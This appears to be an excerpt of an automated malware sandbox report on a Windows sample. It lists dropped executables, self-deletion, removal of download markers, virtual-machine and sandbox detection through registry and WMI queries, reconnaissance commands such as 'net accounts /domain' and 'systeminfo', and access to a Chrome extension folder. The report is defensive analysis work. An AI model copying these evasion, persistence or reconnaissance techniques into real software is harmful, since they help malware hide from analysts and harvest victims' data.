Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_00402822 push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_00401328 push edi; retf	6_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004027ED push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004027FB push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B2862 push esp; ret	6_2_006B2A2D
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B1072 push esi; ret	6_2_006B1073
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B2875 push esp; ret	6_2_006B2A2D
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B2854 push esp; ret	6_2_006B2A2D
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B1909 push esp; iretd	6_2_006B19BF
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B2889 push esp; ret	6_2_006B2A2D
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B1386 push edi; retf	6_2_006B1391
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_006B2886 push esp; ret	6_2_006B2A2D
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_008B2195 push esi; ret	6_2_008B2196
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_008B24AC push edi; retf	6_2_008B24AD
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_008B3C1A push 9A832F1Fh; iretd	6_2_008B3C20
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_0040100B push esi; ret	8_2_0040100C

Source: v173TV3V11.exe	Static PE information: section name: .text entropy: 7.463605198956065
Source: C35.exe.1.dr	Static PE information: section name: .text entropy: 7.46113197945979
Source: vejhhuh.1.dr	Static PE information: section name: .text entropy: 7.46113197945979
Source: bsjhhuh.1.dr	Static PE information: section name: .text entropy: 7.463605198956065

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vejhhuh	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\451E.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C35.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bsjhhuh	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vejhhuh			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bsjhhuh			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\v173tv3v11.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\bsjhhuh:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vejhhuh:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_16-890

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\v173TV3V11.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\v173TV3V11.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\bsjhhuh	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\bsjhhuh	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\C35.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\C35.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\vejhhuh	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\vejhhuh	API/Special instruction interceptor: Address: 7FFE2220D584

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 16_2_034A1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,

16_2_034A1016

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 479	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2621	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 681	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 871	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3816
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3298
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 5380
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5307

Source: C:\Windows\explorer.exe TID: 7052	Thread sleep count: 479 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2504	Thread sleep count: 2621 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2504	Thread sleep time: -262100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6984	Thread sleep count: 681 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6984	Thread sleep time: -68100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4092	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2196	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5900	Thread sleep count: 257 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5084	Thread sleep count: 118 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3544	Thread sleep count: 142 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3704	Thread sleep count: 117 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2504	Thread sleep count: 295 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3284	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1784	Thread sleep count: 3816 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1784	Thread sleep time: -3816000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2112	Thread sleep count: 3298 > 30
Source: C:\Windows\explorer.exe TID: 2112	Thread sleep time: -3298000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3960	Thread sleep count: 5380 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3960	Thread sleep time: -5380000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5272	Thread sleep count: 5307 > 30
Source: C:\Windows\explorer.exe TID: 5272	Thread sleep time: -5307000s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\451E.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net accounts /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net accounts /domain			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00419FC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 0041A187h	0_2_00419FC0
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00419FC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 0041A187h	5_2_00419FC0
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_00419D70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 00419F37h	6_2_00419D70
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_00419D70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 00419F37h	8_2_00419D70

Source: C:\Users\user\AppData\Local\Temp\451E.exe	Code function: 9_2_00007FF763AFFB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF763AFFB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00802B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00802B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00801D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00801D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00803ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00803ED9
Source: C:\Windows\explorer.exe	Code function: 14_2_00C830A8 FindFirstFileW,FindNextFileW,FindClose,	14_2_00C830A8

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00806512 GetSystemInfo,

11_2_00806512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: explorer.exe, 00000001.00000000.1764358626.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1762089358.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1764358626.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1764358626.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: 451E.exe, 00000009.00000003.3322167908.000002E002E41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: 65VTFHAz2bVBkhR\r\nSystem Model: awcHydbR\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ED6RW 2PPTY, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'848 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'115 MB\r\nVirtual Memory: In Use: 1'076 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 8OhXz\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n3273417056311350223273417056\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>Class 3 Public Primary Certification Authority","from":"1997-04-17 00:00:00 000","expire":"2016-10-24 23:59:59 000","obj_id":"1.2.840.113549.1.1.1"},{"name":"Microsoft Windows Hardware Compatibility","subject":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Microsoft Corporation, CN=Microsoft Windows Hardware Compatibility","issuer":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root A
Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000002.2707106638.00000000009FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR6B
Source: explorer.exe, 00000001.00000000.1764358626.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1762089358.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 451E.exe, 00000009.00000003.3322030879.000002E002E3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 3273417056311350223273417056\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: 65VTFHAz2bVBkhR\r\nSystem Model: awcHydbR\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ED6RW 2PPTY, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'848 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'115 MB\r\nVirtual Memory: In Use: 1'076 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 8OhXz\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n 